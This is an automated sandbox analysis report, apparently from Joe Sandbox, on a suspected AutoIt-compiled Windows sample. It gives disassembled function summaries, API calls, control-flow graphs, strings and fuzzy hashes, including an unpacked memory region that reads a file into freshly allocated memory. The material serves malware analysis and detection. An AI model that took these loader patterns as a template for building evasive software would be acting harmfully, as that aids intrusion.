                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AEF6D8,000000FF,00000000), ref: 00410552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _malloc
                                                    • String ID: Default
                                                    • API String ID: 1579825452-753088835
                                                    • Opcode ID: 1198bc52e153da64d8690da2c80d8544fbc7663c125e93963ee1fcdb872695e3
                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                    • Opcode Fuzzy Hash: 1198bc52e153da64d8690da2c80d8544fbc7663c125e93963ee1fcdb872695e3
                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1237 40f5c0-40f5cf call 422240 1240 40f5d0-40f5e8 1237->1240 1240->1240 1241 40f5ea-40f613 call 413650 call 410e60 1240->1241 1246 40f614-40f633 call 414d04 1241->1246 1249 40f691 1246->1249 1250 40f635-40f63c 1246->1250 1251 40f696-40f69c 1249->1251 1252 40f660-40f674 call 4150d1 1250->1252 1253 40f63e 1250->1253 1257 40f679-40f67c 1252->1257 1254 40f640 1253->1254 1256 40f642-40f650 1254->1256 1258 40f652-40f655 1256->1258 1259 40f67e-40f68c 1256->1259 1257->1246 1260 40f65b-40f65e 1258->1260 1261 425d1e-425d3e call 4150d1 call 414d04 1258->1261 1262 40f68e-40f68f 1259->1262 1263 40f69f-40f6ad 1259->1263 1260->1252 1260->1254 1274 425d43-425d5f call 414d30 1261->1274 1262->1258 1264 40f6b4-40f6c2 1263->1264 1265 40f6af-40f6b2 1263->1265 1267 425d16 1264->1267 1268 40f6c8-40f6d6 1264->1268 1265->1258 1267->1261 1270 425d05-425d0b 1268->1270 1271 40f6dc-40f6df 1268->1271 1270->1256 1273 425d11 1270->1273 1271->1258 1273->1267 1274->1251
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                    • String ID: AU3!$EA06
                                                    • API String ID: 1268643489-2658333250
                                                    • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                    • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1277 401100-401111 1278 401113-401119 1277->1278 1279 401179-401180 1277->1279 1281 401144-40114a 1278->1281 1282 40111b-40111e 1278->1282 1279->1278 1280 401182 1279->1280 1283 40112c-401141 DefWindowProcW 1280->1283 1285 401184-40118e call 401250 1281->1285 1286 40114c-40114f 1281->1286 1282->1281 1284 401120-401126 1282->1284 1284->1283 1288 42b038-42b03f 1284->1288 1292 401193-40119a 1285->1292 1289 401151-401157 1286->1289 1290 40119d 1286->1290 1288->1283 1291 42b045-42b059 call 401000 call 40e0c0 1288->1291 1295 401219-40121f 1289->1295 1296 40115d 1289->1296 1293 4011a3-4011a9 1290->1293 1294 42afb4-42afc5 call 40f190 1290->1294 1291->1283 1293->1284 1302 4011af 1293->1302 1294->1292 1295->1284 1299 401225-42b06d call 468b0e 1295->1299 1297 401163-401166 1296->1297 1298 42b01d-42b024 1296->1298 1303 42afe9-42b018 call 40f190 call 401a50 1297->1303 1304 40116c-401172 1297->1304 1298->1283 1310 42b02a-42b033 call 4370f4 1298->1310 1299->1292 1302->1284 1308 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1302->1308 1309 4011db-401202 SetTimer RegisterWindowMessageW 1302->1309 1303->1283 1304->1284 1312 401174-42afde call 45fd57 1304->1312 1309->1292 1317 401204-401216 CreatePopupMenu 1309->1317 1310->1283 1312->1283 1328 42afe4 1312->1328 1328->1292
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                    • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1329 4115d7-4115df 1330 4115ee-4115f9 call 4135bb 1329->1330 1333 4115e1-4115ec call 411988 1330->1333 1334 4115fb-4115fc 1330->1334 1333->1330 1337 4115fd-41160e 1333->1337 1338 411610-41163b call 417fc0 call 41130a 1337->1338 1339 41163c-411656 call 4180af call 418105 1337->1339 1338->1339
                                                    APIs
                                                    • _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                    • String ID: ,*H$4*H$@fI
                                                    • API String ID: 615853336-1459471987
                                                    • Opcode ID: 4c3234da221406e919e60ca1662c01636fb1b8f8df4bcb261aa51e1772e486af
                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                    • Opcode Fuzzy Hash: 4c3234da221406e919e60ca1662c01636fb1b8f8df4bcb261aa51e1772e486af
                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1348 a82600-a826ae call a80000 1351 a826b5-a826db call a83510 CreateFileW 1348->1351 1354 a826dd 1351->1354 1355 a826e2-a826f2 1351->1355 1356 a8282d-a82831 1354->1356 1362 a826f9-a82713 VirtualAlloc 1355->1362 1363 a826f4 1355->1363 1357 a82873-a82876 1356->1357 1358 a82833-a82837 1356->1358 1364 a82879-a82880 1357->1364 1360 a82839-a8283c 1358->1360 1361 a82843-a82847 1358->1361 1360->1361 1365 a82849-a82853 1361->1365 1366 a82857-a8285b 1361->1366 1367 a8271a-a82731 ReadFile 1362->1367 1368 a82715 1362->1368 1363->1356 1369 a82882-a8288d 1364->1369 1370 a828d5-a828ea 1364->1370 1365->1366 1375 a8286b 1366->1375 1376 a8285d-a82867 1366->1376 1377 a82738-a82778 VirtualAlloc 1367->1377 1378 a82733 1367->1378 1368->1356 1371 a8288f 1369->1371 1372 a82891-a8289d 1369->1372 1373 a828fa-a82902 1370->1373 1374 a828ec-a828f7 VirtualFree 1370->1374 1371->1370 1379 a8289f-a828af 1372->1379 1380 a828b1-a828bd 1372->1380 1374->1373 1375->1357 1376->1375 1381 a8277a 1377->1381 1382 a8277f-a8279a call a83760 1377->1382 1378->1356 1384 a828d3 1379->1384 1385 a828ca-a828d0 1380->1385 1386 a828bf-a828c8 1380->1386 1381->1356 1388 a827a5-a827af 1382->1388 1384->1364 1385->1384 1386->1384 1389 a827b1-a827e0 call a83760 1388->1389 1390 a827e2-a827f6 call a83570 1388->1390 1389->1388 1396 a827f8 1390->1396 1397 a827fa-a827fe 1390->1397 1396->1356 1398 a8280a-a8280e 1397->1398 1399 a82800-a82804 CloseHandle 1397->1399 1400 a8281e-a82827 1398->1400 1401 a82810-a8281b VirtualFree 1398->1401 1399->1398 1400->1351 1400->1356 1401->1400
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A826D1
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A828F7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2183327966.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a80000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
                                                    • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                    • Instruction ID: f02832111b4b2c4b284a94d368e78e677a53e0c793b84ee15b2de0000b9313a5
                                                    • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                    • Instruction Fuzzy Hash: C4A1F374E00209EBDF14DFA4C994BAEBBB5FF48704F208559E501BB280D7799A81DF94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1402 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1405 427190-4271ae RegQueryValueExW 1402->1405 1406 40e4eb-40e4f0 1402->1406 1407 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1405->1407 1408 42721a-42722a RegCloseKey 1405->1408 1413 427210-427219 call 436508 1407->1413 1414 4271f7-42720e call 402160 1407->1414 1413->1408 1414->1413
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: b71d51f64b70c65a21aacfd12bd9f8cd1a00b42160e05dfef4e297133c897f40
                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                    • Opcode Fuzzy Hash: b71d51f64b70c65a21aacfd12bd9f8cd1a00b42160e05dfef4e297133c897f40
                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                    APIs
                                                      • Part of subcall function 00A822A0: Sleep.KERNELBASE(000001F4), ref: 00A822B1
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A824ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2183327966.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a80000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: ZYCCTNZTVX6TAWSUHFCEQ4T
                                                    • API String ID: 2694422964-2926783204
                                                    • Opcode ID: 6eef65bf6f37b9e4340b438dfadb6f551b67c1fe66b16d2ef7efcad5f420b5b0
                                                    • Instruction ID: 76f32ccb54a125b501b8cab07956aad2b221d9bf17825b545c5bb5b681c690b5
                                                    • Opcode Fuzzy Hash: 6eef65bf6f37b9e4340b438dfadb6f551b67c1fe66b16d2ef7efcad5f420b5b0
                                                    • Instruction Fuzzy Hash: 62516330D04288DBEF15DBE4C859BEEBB75AF15304F104198E249BB2C1D6BA1B48CBA5
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 1607946009-824357125
                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                    APIs
                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                    • String ID:
                                                    • API String ID: 3170942423-0
                                                    • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                    • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                    • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                    • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #v
                                                    • API String ID: 0-554117064
                                                    • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                    • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentTerminate
                                                    • String ID: #v
                                                    • API String ID: 2429186680-554117064
                                                    • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                    • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                    • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                    • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                    APIs
